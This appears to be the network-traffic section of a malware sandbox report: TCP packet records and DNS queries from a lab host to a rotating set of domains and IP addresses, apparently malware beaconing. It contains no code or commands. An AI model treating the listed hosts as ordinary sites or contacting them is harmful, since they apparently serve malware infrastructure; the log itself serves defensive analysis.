Nov 25, 2024 18:12:40.695085049 CET | 49805 | 80 | 192.168.2.4 | 85.159.66.93
Nov 25, 2024 18:12:40.697352886 CET | 49805 | 80 | 192.168.2.4 | 85.159.66.93
Nov 25, 2024 18:12:40.818993092 CET | 80 | 49805 | 85.159.66.93 | 192.168.2.4
Nov 25, 2024 18:12:40.819061995 CET | 80 | 49805 | 85.159.66.93 | 192.168.2.4
Nov 25, 2024 18:12:40.819106102 CET | 80 | 49805 | 85.159.66.93 | 192.168.2.4
Nov 25, 2024 18:12:40.819164991 CET | 80 | 49805 | 85.159.66.93 | 192.168.2.4
Nov 25, 2024 18:12:40.819252968 CET | 80 | 49805 | 85.159.66.93 | 192.168.2.4
Nov 25, 2024 18:12:40.819324970 CET | 80 | 49805 | 85.159.66.93 | 192.168.2.4
Nov 25, 2024 18:12:40.819411993 CET | 80 | 49805 | 85.159.66.93 | 192.168.2.4
Nov 25, 2024 18:12:40.819422007 CET | 80 | 49805 | 85.159.66.93 | 192.168.2.4
Nov 25, 2024 18:12:40.819525957 CET | 80 | 49805 | 85.159.66.93 | 192.168.2.4
Nov 25, 2024 18:12:42.210793018 CET | 49805 | 80 | 192.168.2.4 | 85.159.66.93
Nov 25, 2024 18:12:42.332530975 CET | 80 | 49805 | 85.159.66.93 | 192.168.2.4
Nov 25, 2024 18:12:42.332611084 CET | 49805 | 80 | 192.168.2.4 | 85.159.66.93
Nov 25, 2024 18:12:43.230247021 CET | 49811 | 80 | 192.168.2.4 | 85.159.66.93
Nov 25, 2024 18:12:43.351164103 CET | 80 | 49811 | 85.159.66.93 | 192.168.2.4
Nov 25, 2024 18:12:43.356072903 CET | 49811 | 80 | 192.168.2.4 | 85.159.66.93
Nov 25, 2024 18:12:43.356072903 CET | 49811 | 80 | 192.168.2.4 | 85.159.66.93
Nov 25, 2024 18:12:43.476535082 CET | 80 | 49811 | 85.159.66.93 | 192.168.2.4
Nov 25, 2024 18:13:44.783057928 CET | 80 | 49811 | 85.159.66.93 | 192.168.2.4
Nov 25, 2024 18:13:44.783121109 CET | 80 | 49811 | 85.159.66.93 | 192.168.2.4
Nov 25, 2024 18:13:44.783297062 CET | 49811 | 80 | 192.168.2.4 | 85.159.66.93
Nov 25, 2024 18:13:44.786468983 CET | 49811 | 80 | 192.168.2.4 | 85.159.66.93
Nov 25, 2024 18:13:44.907136917 CET | 80 | 49811 | 85.159.66.93 | 192.168.2.4
Nov 25, 2024 18:13:50.137568951 CET | 49937 | 80 | 192.168.2.4 | 91.195.240.94
Nov 25, 2024 18:13:50.258111954 CET | 80 | 49937 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:50.258200884 CET | 49937 | 80 | 192.168.2.4 | 91.195.240.94
Nov 25, 2024 18:13:50.260495901 CET | 49937 | 80 | 192.168.2.4 | 91.195.240.94
Nov 25, 2024 18:13:50.380912066 CET | 80 | 49937 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:51.656143904 CET | 80 | 49937 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:51.656207085 CET | 80 | 49937 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:51.656270981 CET | 49937 | 80 | 192.168.2.4 | 91.195.240.94
Nov 25, 2024 18:13:51.773469925 CET | 49937 | 80 | 192.168.2.4 | 91.195.240.94
Nov 25, 2024 18:13:52.791997910 CET | 49944 | 80 | 192.168.2.4 | 91.195.240.94
Nov 25, 2024 18:13:52.912488937 CET | 80 | 49944 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:52.914524078 CET | 49944 | 80 | 192.168.2.4 | 91.195.240.94
Nov 25, 2024 18:13:52.920407057 CET | 49944 | 80 | 192.168.2.4 | 91.195.240.94
Nov 25, 2024 18:13:53.042263985 CET | 80 | 49944 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:54.241307974 CET | 80 | 49944 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:54.241507053 CET | 80 | 49944 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:54.241570950 CET | 49944 | 80 | 192.168.2.4 | 91.195.240.94
Nov 25, 2024 18:13:54.429672956 CET | 49944 | 80 | 192.168.2.4 | 91.195.240.94
Nov 25, 2024 18:13:55.448512077 CET | 49950 | 80 | 192.168.2.4 | 91.195.240.94
Nov 25, 2024 18:13:55.569046021 CET | 80 | 49950 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:55.570703983 CET | 49950 | 80 | 192.168.2.4 | 91.195.240.94
Nov 25, 2024 18:13:55.572906017 CET | 49950 | 80 | 192.168.2.4 | 91.195.240.94
Nov 25, 2024 18:13:55.693559885 CET | 80 | 49950 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:55.693578005 CET | 80 | 49950 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:55.693661928 CET | 80 | 49950 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:55.693675995 CET | 80 | 49950 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:55.693751097 CET | 80 | 49950 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:55.693816900 CET | 80 | 49950 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:55.693872929 CET | 80 | 49950 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:55.693885088 CET | 80 | 49950 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:55.693953037 CET | 80 | 49950 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:56.863779068 CET | 80 | 49950 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:56.874697924 CET | 80 | 49950 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:56.874806881 CET | 49950 | 80 | 192.168.2.4 | 91.195.240.94
Nov 25, 2024 18:13:57.086349010 CET | 49950 | 80 | 192.168.2.4 | 91.195.240.94
Nov 25, 2024 18:13:58.105535984 CET | 49957 | 80 | 192.168.2.4 | 91.195.240.94
Nov 25, 2024 18:13:58.225944996 CET | 80 | 49957 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:58.226018906 CET | 49957 | 80 | 192.168.2.4 | 91.195.240.94
Nov 25, 2024 18:13:58.228084087 CET | 49957 | 80 | 192.168.2.4 | 91.195.240.94
Nov 25, 2024 18:13:58.349806070 CET | 80 | 49957 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:59.633307934 CET | 80 | 49957 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:59.633322954 CET | 80 | 49957 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:59.633342028 CET | 80 | 49957 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:59.633363962 CET | 80 | 49957 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:59.633377075 CET | 80 | 49957 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:59.633387089 CET | 80 | 49957 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:59.633398056 CET | 80 | 49957 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:59.633409977 CET | 80 | 49957 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:59.633445024 CET | 49957 | 80 | 192.168.2.4 | 91.195.240.94
Nov 25, 2024 18:13:59.633469105 CET | 80 | 49957 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:59.633481979 CET | 80 | 49957 | 91.195.240.94 | 192.168.2.4
Nov 25, 2024 18:13:59.633502960 CET | 49957 | 80 | 192.168.2.4 | 91.195.240.94
Nov 25, 2024 18:13:59.633527040 CET | 49957 | 80 | 192.168.2.4 | 91.195.240.94
                                                                                  Nov 25, 2024 18:13:59.753947020 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.754005909 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.754115105 CET4995780192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:59.758156061 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.804586887 CET4995780192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:59.834649086 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.834697008 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.834774017 CET4995780192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:59.838870049 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.838979006 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.839051962 CET4995780192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:59.847537041 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.847577095 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.847646952 CET4995780192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:59.855782986 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.855865002 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:13:59.855940104 CET4995780192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:59.858670950 CET4995780192.168.2.491.195.240.94
                                                                                  Nov 25, 2024 18:13:59.980142117 CET804995791.195.240.94192.168.2.4
                                                                                  Nov 25, 2024 18:14:14.034852028 CET4999280192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:14.155302048 CET804999266.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:14.155376911 CET4999280192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:14.157547951 CET4999280192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:14.279181957 CET804999266.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:15.476638079 CET804999266.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:15.476677895 CET804999266.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:15.476763010 CET4999280192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:15.664108992 CET4999280192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:16.684458971 CET4999880192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:16.805843115 CET804999866.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:16.808553934 CET4999880192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:16.812448025 CET4999880192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:16.932952881 CET804999866.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:18.107289076 CET804999866.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:18.107475996 CET804999866.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:18.107528925 CET4999880192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:18.320488930 CET4999880192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:19.339931965 CET5000580192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:19.460556984 CET805000566.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:19.460731983 CET5000580192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:19.462949038 CET5000580192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:19.583734035 CET805000566.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:19.583770990 CET805000566.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:19.583854914 CET805000566.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:19.583908081 CET805000566.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:19.583944082 CET805000566.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:19.584094048 CET805000566.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:19.584122896 CET805000566.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:19.584175110 CET805000566.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:19.584203959 CET805000566.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:20.787000895 CET805000566.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:20.787015915 CET805000566.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:20.787206888 CET5000580192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:20.976955891 CET5000580192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:22.016592026 CET5001380192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:22.137470007 CET805001366.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:22.137551069 CET5001380192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:22.140304089 CET5001380192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:22.263262033 CET805001366.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:23.456640005 CET805001366.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:23.456794977 CET805001366.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:23.456950903 CET5001380192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:23.462579012 CET5001380192.168.2.466.29.149.46
                                                                                  Nov 25, 2024 18:14:23.590068102 CET805001366.29.149.46192.168.2.4
                                                                                  Nov 25, 2024 18:14:34.292339087 CET5001980192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:34.417608976 CET8050019195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:34.417692900 CET5001980192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:34.420121908 CET5001980192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:34.546010971 CET8050019195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:35.873465061 CET8050019195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:35.873868942 CET8050019195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:35.873935938 CET5001980192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:35.929992914 CET5001980192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:36.948410034 CET5002080192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:37.068967104 CET8050020195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:37.069118977 CET5002080192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:37.070976019 CET5002080192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:37.191445112 CET8050020195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:38.425026894 CET8050020195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:38.425255060 CET8050020195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:38.425321102 CET5002080192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:38.586050034 CET5002080192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:39.604475021 CET5002180192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:39.725178957 CET8050021195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:39.725255966 CET5002180192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:39.727935076 CET5002180192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:39.848423958 CET8050021195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:39.848443985 CET8050021195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:39.848550081 CET8050021195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:39.848603010 CET8050021195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:39.848612070 CET8050021195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:39.848722935 CET8050021195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:39.848738909 CET8050021195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:39.848747969 CET8050021195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:39.848756075 CET8050021195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:41.151376963 CET8050021195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:41.151459932 CET8050021195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:41.152529955 CET5002180192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:41.244481087 CET5002180192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:42.272392988 CET5002280192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:42.392925978 CET8050022195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:42.392992020 CET5002280192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:42.396215916 CET5002280192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:42.516709089 CET8050022195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:43.704267979 CET8050022195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:43.704552889 CET8050022195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:14:43.704610109 CET5002280192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:43.707626104 CET5002280192.168.2.4195.110.124.133
                                                                                  Nov 25, 2024 18:14:43.828557014 CET8050022195.110.124.133192.168.2.4
                                                                                  Nov 25, 2024 18:15:06.092111111 CET5002380192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:06.284584045 CET8050023217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:06.284666061 CET5002380192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:06.287043095 CET5002380192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:06.486644983 CET8050023217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:07.583836079 CET8050023217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:07.584134102 CET8050023217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:07.586683989 CET5002380192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:07.789272070 CET5002380192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:08.807718039 CET5002480192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:08.929816008 CET8050024217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:08.929918051 CET5002480192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:08.931967020 CET5002480192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:09.052447081 CET8050024217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:10.214279890 CET8050024217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:10.214567900 CET8050024217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:10.214632988 CET5002480192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:10.445477009 CET5002480192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:11.466717005 CET5002580192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:11.588392019 CET8050025217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:11.590734959 CET5002580192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:11.594854116 CET5002580192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:11.715939045 CET8050025217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:11.715950012 CET8050025217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:11.716093063 CET8050025217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:11.716101885 CET8050025217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:11.716156006 CET8050025217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:11.716167927 CET8050025217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:11.716270924 CET8050025217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:11.716301918 CET8050025217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:11.716355085 CET8050025217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:12.854144096 CET8050025217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:12.854506969 CET8050025217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:12.854671001 CET5002580192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:13.101754904 CET5002580192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:14.121077061 CET5002680192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:14.326677084 CET8050026217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:14.326807976 CET5002680192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:14.328917027 CET5002680192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:14.449512005 CET8050026217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:15.645354033 CET8050026217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:15.645380020 CET8050026217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:15.646955967 CET5002680192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:15.649652958 CET5002680192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:15.903495073 CET8050026217.196.55.202192.168.2.4
                                                                                  Nov 25, 2024 18:15:15.903547049 CET5002680192.168.2.4217.196.55.202
                                                                                  Nov 25, 2024 18:15:15.966473103 CET8050026217.196.55.202192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2024 18:11:43.740101099 CET | 64696 | 53 | 192.168.2.4 | 1.1.1.1
Nov 25, 2024 18:11:44.742054939 CET | 64696 | 53 | 192.168.2.4 | 1.1.1.1
Nov 25, 2024 18:11:45.273855925 CET | 53 | 64696 | 1.1.1.1 | 192.168.2.4
Nov 25, 2024 18:11:45.273925066 CET | 53 | 64696 | 1.1.1.1 | 192.168.2.4
Nov 25, 2024 18:12:02.089754105 CET | 65180 | 53 | 192.168.2.4 | 1.1.1.1
Nov 25, 2024 18:12:02.490097046 CET | 53 | 65180 | 1.1.1.1 | 192.168.2.4
Nov 25, 2024 18:12:10.558499098 CET | 55906 | 53 | 192.168.2.4 | 1.1.1.1
Nov 25, 2024 18:12:11.349772930 CET | 53 | 55906 | 1.1.1.1 | 192.168.2.4
Nov 25, 2024 18:12:26.201277971 CET | 52394 | 53 | 192.168.2.4 | 1.1.1.1
Nov 25, 2024 18:12:26.470197916 CET | 53 | 52394 | 1.1.1.1 | 192.168.2.4
Nov 25, 2024 18:12:34.527267933 CET | 50550 | 53 | 192.168.2.4 | 1.1.1.1
Nov 25, 2024 18:12:35.263115883 CET | 53 | 50550 | 1.1.1.1 | 192.168.2.4
Nov 25, 2024 18:13:49.794879913 CET | 57919 | 53 | 192.168.2.4 | 1.1.1.1
Nov 25, 2024 18:13:50.134900093 CET | 53 | 57919 | 1.1.1.1 | 192.168.2.4
Nov 25, 2024 18:14:04.870044947 CET | 54770 | 53 | 192.168.2.4 | 1.1.1.1
Nov 25, 2024 18:14:05.094636917 CET | 53 | 54770 | 1.1.1.1 | 192.168.2.4
Nov 25, 2024 18:14:13.278300047 CET | 51960 | 53 | 192.168.2.4 | 1.1.1.1
Nov 25, 2024 18:14:14.032269001 CET | 53 | 51960 | 1.1.1.1 | 192.168.2.4
Nov 25, 2024 18:14:33.480474949 CET | 63794 | 53 | 192.168.2.4 | 1.1.1.1
Nov 25, 2024 18:14:34.288746119 CET | 53 | 63794 | 1.1.1.1 | 192.168.2.4
Nov 25, 2024 18:14:48.714626074 CET | 59172 | 53 | 192.168.2.4 | 1.1.1.1
Nov 25, 2024 18:14:48.947113037 CET | 53 | 59172 | 1.1.1.1 | 192.168.2.4
Nov 25, 2024 18:14:57.027045965 CET | 54667 | 53 | 192.168.2.4 | 1.1.1.1
Nov 25, 2024 18:14:57.409828901 CET | 53 | 54667 | 1.1.1.1 | 192.168.2.4
Nov 25, 2024 18:15:05.464744091 CET | 60568 | 53 | 192.168.2.4 | 1.1.1.1
Nov 25, 2024 18:15:06.089353085 CET | 53 | 60568 | 1.1.1.1 | 192.168.2.4
Nov 25, 2024 18:15:21.012162924 CET | 52091 | 53 | 192.168.2.4 | 1.1.1.1
Nov 25, 2024 18:15:21.297362089 CET | 53 | 52091 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 25, 2024 18:11:43.740101099 CET | 192.168.2.4 | 1.1.1.1 | 0x5667 | Standard query (0) | www.3xfootball.com | A (IP address) | IN (0x0001) | false
Nov 25, 2024 18:11:44.742054939 CET | 192.168.2.4 | 1.1.1.1 | 0x5667 | Standard query (0) | www.3xfootball.com | A (IP address) | IN (0x0001) | false
Nov 25, 2024 18:12:02.089754105 CET | 192.168.2.4 | 1.1.1.1 | 0x5531 | Standard query (0) | www.kasegitai.tokyo | A (IP address) | IN (0x0001) | false
Nov 25, 2024 18:12:10.558499098 CET | 192.168.2.4 | 1.1.1.1 | 0xa62 | Standard query (0) | www.goldenjade-travel.com | A (IP address) | IN (0x0001) | false
Nov 25, 2024 18:12:26.201277971 CET | 192.168.2.4 | 1.1.1.1 | 0x40af | Standard query (0) | www.antonio-vivaldi.mobi | A (IP address) | IN (0x0001) | false
Nov 25, 2024 18:12:34.527267933 CET | 192.168.2.4 | 1.1.1.1 | 0xa49f | Standard query (0) | www.magmadokum.com | A (IP address) | IN (0x0001) | false
Nov 25, 2024 18:13:49.794879913 CET | 192.168.2.4 | 1.1.1.1 | 0x50cc | Standard query (0) | www.rssnewscast.com | A (IP address) | IN (0x0001) | false
Nov 25, 2024 18:14:04.870044947 CET | 192.168.2.4 | 1.1.1.1 | 0xec33 | Standard query (0) | www.liangyuen528.com | A (IP address) | IN (0x0001) | false
Nov 25, 2024 18:14:13.278300047 CET | 192.168.2.4 | 1.1.1.1 | 0xfdaf | Standard query (0) | www.techchains.info | A (IP address) | IN (0x0001) | false
Nov 25, 2024 18:14:33.480474949 CET | 192.168.2.4 | 1.1.1.1 | 0xaac4 | Standard query (0) | www.elettrosistemista.zip | A (IP address) | IN (0x0001) | false
Nov 25, 2024 18:14:48.714626074 CET | 192.168.2.4 | 1.1.1.1 | 0xfb36 | Standard query (0) | www.donnavariedades.com | A (IP address) | IN (0x0001) | false
Nov 25, 2024 18:14:57.027045965 CET | 192.168.2.4 | 1.1.1.1 | 0x1282 | Standard query (0) | www.660danm.top | A (IP address) | IN (0x0001) | false
Nov 25, 2024 18:15:05.464744091 CET | 192.168.2.4 | 1.1.1.1 | 0x6c65 | Standard query (0) | www.empowermedeco.com | A (IP address) | IN (0x0001) | false
Nov 25, 2024 18:15:21.012162924 CET | 192.168.2.4 | 1.1.1.1 | 0x8114 | Standard query (0) | www.joyesi.xyz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 25, 2024 18:11:45.273855925 CET | 1.1.1.1 | 192.168.2.4 | 0x5667 | No error (0) | www.3xfootball.com | | 154.215.72.110 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 18:11:45.273925066 CET | 1.1.1.1 | 192.168.2.4 | 0x5667 | No error (0) | www.3xfootball.com | | 154.215.72.110 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 18:12:02.490097046 CET | 1.1.1.1 | 192.168.2.4 | 0x5531 | Name error (3) | www.kasegitai.tokyo | none | none | A (IP address) | IN (0x0001) | false
Nov 25, 2024 18:12:11.349772930 CET | 1.1.1.1 | 192.168.2.4 | 0xa62 | No error (0) | www.goldenjade-travel.com | | 116.50.37.244 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 18:12:26.470197916 CET | 1.1.1.1 | 192.168.2.4 | 0x40af | Name error (3) | www.antonio-vivaldi.mobi | none | none | A (IP address) | IN (0x0001) | false
Nov 25, 2024 18:12:35.263115883 CET | 1.1.1.1 | 192.168.2.4 | 0xa49f | No error (0) | www.magmadokum.com | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 25, 2024 18:12:35.263115883 CET | 1.1.1.1 | 192.168.2.4 | 0xa49f | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 25, 2024 18:12:35.263115883 CET | 1.1.1.1 | 192.168.2.4 | 0xa49f | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 18:13:50.134900093 CET | 1.1.1.1 | 192.168.2.4 | 0x50cc | No error (0) | www.rssnewscast.com | | 91.195.240.94 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 18:14:05.094636917 CET | 1.1.1.1 | 192.168.2.4 | 0xec33 | Name error (3) | www.liangyuen528.com | none | none | A (IP address) | IN (0x0001) | false
Nov 25, 2024 18:14:14.032269001 CET | 1.1.1.1 | 192.168.2.4 | 0xfdaf | No error (0) | www.techchains.info | | 66.29.149.46 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 18:14:34.288746119 CET | 1.1.1.1 | 192.168.2.4 | 0xaac4 | No error (0) | www.elettrosistemista.zip | elettrosistemista.zip | | CNAME (Canonical name) | IN (0x0001) | false
